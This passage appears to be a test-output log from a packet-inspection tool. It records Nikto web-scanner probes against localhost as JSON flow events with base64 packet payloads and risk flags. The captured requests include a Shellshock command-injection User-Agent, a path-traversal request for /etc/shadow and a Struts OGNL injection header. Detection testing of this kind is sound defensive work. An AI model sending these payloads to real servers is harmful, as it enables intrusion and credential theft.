93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277471,"pkt":"AAAAAAAAAAAAAAAACABFAAEB0rpAAEAGaTp\/AAABfwAAAcWAH5AE8+pw+\/3ZB4AYAED+9QAAAQEICp1m\/gedZv4HR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} -01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7440000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277473,"pkt":"AAAAAAAAAAAAAAAACABFAADnqaNAAEAGkmt\/AAABfwAAAcWCH5DlqJF6VmPeaYAYAED+2wAAAQEICp1m\/gmdZv4JR0VUIC8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvc2hhZG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpkaXNod2FzaGVyKQ0KDQo="} -01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7440000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:dishwasher)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1576420277474,"pkt":"AAAAAAAAAAAAAAAACABFAAFN5cZAAEAGVeJ\/AAABfwAAAcWEH5A2eN0dBhBSM4AYAED\/QQAAAQEICp1m\/gqdZv4KR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiAleyNjb250ZXh0Wydjb20ub3BlbnN5bXBob255Lnh3b3JrMi5kaXNwYXRjaGVyLkh0dHBTZXJ2bGV0UmVzcG9uc2UnXS5hZGRIZWFkZXIoJ05pa3RvLUFkZGVkLUNWRS0yMDE3LTU2MzgnLDcqNil9Lm11bHRpcGFydC9mb3JtLWRhdGENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzdHJ1dHNob2NrKQ0KDQo="} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277477,"pkt":"AAAAAAAAAAAAAAAACABFAAFZtP1AAEAGhp9\/AAABfwAAAcWGH5CUg4wjlAViUYAYAED\/TQAAAQEICp1m\/g2dZv4NR0VUIC9pbmRleC5hY3Rpb24gSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogJXsjY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlJ10uYWRkSGVhZGVyKCdOaWt0by1BZGRlZC1DVkUtMjAxNy01NjM4Jyw3KjYpfS5tdWx0aXBhcnQvZm9ybS1kYXRhDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c3RydXRzaG9jaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277478,"pkt":"AAAAAAAAAAAAAAAACABFAAFZjkpAAEAGrVJ\/AAABfwAAAcWIH5BLo7aS1iADwIAYAED\/TQAAAQEICp1m\/g6dZv4OR0VUIC9sb2dpbi5hY3Rpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnN0cnV0c2hvY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6ICV7I2NvbnRleHRbJ2NvbS5vcGVuc3ltcGhvbnkueHdvcmsyLmRpc3BhdGNoZXIuSHR0cFNlcnZsZXRSZXNwb25zZSddLmFkZEhlYWRlcignTmlrdG8tQWRkZWQtQ1ZFLTIwMTctNTYzOCcsNyo2KX0ubXVsdGlwYXJ0L2Zvcm0tZGF0YQ0KDQo="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277480,"pkt":"AAAAAAAAAAAAAAAACABFAAC6N0ZAAEAGBPZ\/AAABfwAAAcWKH5D5Xg+fNMDiFYAYAED+rgAAAQEICp1m\/hCdZv4QR0VUIC92Mi9fY2F0YWxvZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7440000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/v2\/_catalog","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277488,"pkt":"AAAAAAAAAAAAAAAACABFAADHoFdAAEAGm9d\/AAABfwAAAcWMH5DDZpiKMo58\/IAYAED+uwAAAQEICp1m\/hidZv4YR0VUIC9jZmFwcG1hbi9pbmRleC5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxMykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfappman\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000013)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277490,"pkt":"AAAAAAAAAAAAAAAACABFAADZlJRAAEAGp4h\/AAABfwAAAcWOH5DTxKxPH2zSx4AYAED+zQAAAQEICp1m\/hqdZv4aR0VUIC9jZmRvY3MvZXhhbXBsZXMvY3ZiZWFucy9iZWFuaW5mby5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNCkNCg0K"} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/cvbeans\/beaninfo.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000014)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":227,"pkt_l4_len":193,"thread_ts_msec":1576420277491,"pkt":"AAAAAAAAAAAAAAAACABFAADVNLZAAEAGB2t\/AAABfwAAAcWQH5BQIAxp\/aIKGoAYAED+yQAAAQEICp1m\/hudZv4bR0VUIC9jZmRvY3MvZXhhbXBsZXMvcGFya3MvZGV0YWlsLmNmbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01081{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":507,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7440000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"flow_avg_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420277491,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfdocs\/examples\/parks\/detail.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000015)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277492,"pkt":"AAAAAAAAAAAAAAAACABFAAC8BNZAAEAGN2R\/AAABfwAAAcWSH5DUDzwKrTgLpoAYAED+sAAAAQEICp1m\/hydZv4cR0VUIC9rYm9hcmQvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/kboard\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000016)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 